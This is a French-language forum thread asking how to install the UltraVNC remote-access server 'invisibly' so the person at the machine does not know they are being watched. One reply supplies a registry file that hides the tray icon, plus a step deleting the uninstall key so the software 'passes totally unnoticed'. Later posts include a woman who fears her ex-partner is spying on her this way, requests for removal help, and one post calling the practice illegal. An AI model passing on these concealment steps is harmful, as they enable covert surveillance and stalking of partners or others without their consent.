Ultra vnc, installation en "mode invisible&qu

Résolu/Fermé
hm0ngbak - 6 avril 2005 à 11:52
 Alexia - 23 déc. 2012 à 14:40
bonjour, je voudrais savoir comment faire pour installer ultra vnc server en "mode invisible", c'est à dire que le logiciel ne s'affiche ni dans ajout-suppression de programmes, ni sur le bureau, ni dans le menu démarrer et ni dans la barre (en bas à droite à coté de l'horloge). En fait, je ne veux pas que la personnne ne sache qu'elle est assistée. Si quelqu'un sait comment faire je le remercie d'avance.
A voir également:

6 réponses

Bonjour,
Le fait de cacher tout VNC à l'utilisateur est discutable. Celà peut revenir à de l'espionnage. Mais soit... Le débat est long, houleux et loin d'être terminé.
Voici donc comment faire pour masquer VNC autant que possible à l'utilisateur.

Installer VNC comme de coutume mais activer la case "Ne pas créer d'icône" ou "Ne créer aucune icône".
Continuer l'installation.
Lorsque l'installation est treminée, exécuter le fichier .reg listé ci-dessous.

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL]

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3]
"DisableTrayIcon"=dword:00000001
"ConnectPriority"=dword:00000000
"DebugMode"=dword:00000000
"DebugLevel"=dword:00000002
"LoopbackOnly"=dword:00000000
"EnableHTTPDaemon"=dword:00000001
"EnableURLParams"=dword:00000000
"AllowLoopback"=dword:00000000
"AuthRequired"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"AllowProperties"=dword:00000000
"AllowShutdown"=dword:00000000
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000001e
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000001
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"IdleTimeout"=dword:00000000
"LockSetting"=dword:00000000
"RemoveWallpaper"=dword:00000000

Pour le retirer de la liste "Add / Remove programs", il faut encore supprimer la clef
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\TightVNC_is1
Cette clef peut porter un autre nom s'il ne s'agit pas de TightVNC 1.2.9...

Redémarrer la machine.
VNC passera totalement inaperçu.

Enfin, comme VNC fonctionne comme un service, il n'est pas possible de le supprimer de la liste des services actifs...
Mais des permissions(restrictions d'accès) peuvent être posées sur le
répertoire d'installation.

- Yvan -
9
Salut yvan,
en fait voilà, je me suis séparée de mon copain, il m'avait installé VNC VIEUWER, maintenant on est séparés. il ya encore vnc sur mon poste, j'ai vu qu'il peut se connecter en mode invisible, comment je peux faire pour retirer ça de mon poste?? il est peut être en ce moment en train de nous lire !! beurkkkkkcela ne me plait pas
Alors si tu peux faire qqch pour moi!
merci
0
esque sa fonctionne sur VNC4 ?
0
Je veux bien la manip aussi, s'il vous plait, pour vérifier si je n'ai pas une version de VNC cachée installé sur mon pc....
Merc!! ;)
0
pour en etre en securité, prend le tremps de formater completement ton pc, en ayant sauvegardé quelque part vos données et fichiers personnels car le formatage vous tout supprimer, tout ce qui est telechargé, installé, base de registre etc ... comme ca tu sera debarassé de tout et avoir un systeme neuf.
0
Comment faire pour faire réapparaitre l'icone VNC, que j'ai bloqué ?
0
up !
2
Richou61 Messages postés 23 Date d'inscription vendredi 1 mai 2009 Statut Membre Dernière intervention 8 août 2009 3
Modifié par Jeff le 7/06/2013 à 21:34
Pour faire disparaitre l'icone d'ultravnc server (version 1.0.5 et avant peu être), il faut, après avoir installé et paramétré ultravnc, désactiver l'icone dans les "paramètres d'administration). Si on veut désactiver le service il faut faire clic droit sur l'icone et le désactiver ou aller dans "Executer-->msconfig" et chercher uvnc... dans les services. Pour faire réapparaitre l'icone, il faut aller dans le dossier où se trouve UltraVNC Server et ouvrir le fichier texte de configuration (feuille avec un engrenage) nommé "ultravnc" , rechercher la ligne "Disable Tray Icon" et passer de la valeur 1 à la valeur 0. Au redémarrage, l'icone apparaitra ...

Même si c'est un peu tard c'est dit :)
1
Bonjour!

Comment "exécuter le fichier .reg" que tu m'as donné ?
0
Poste de Travail > Disque Local > Windows > Regedit
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
Plus que discutable, c'est illégal, je vois pas l'intérêt sauf à vouloir être présent et actif dans un endroit où on est pas invité, ni forcément désiré.
C'est surement beurk, cette attitude ...
0
si on dit sa on peu se taire !!!
0
Taggle c legal x)
0
Salut!
Savez vous comment désinstaller VNC en mode invisible installé à mon insu sur mon pc..? Il n'apparait nulle part...!
Merci!! ;)
0
la manipulation par fichier reg ne fonctionne pas car l'icone reste toujours en bas a droit de l'écran
0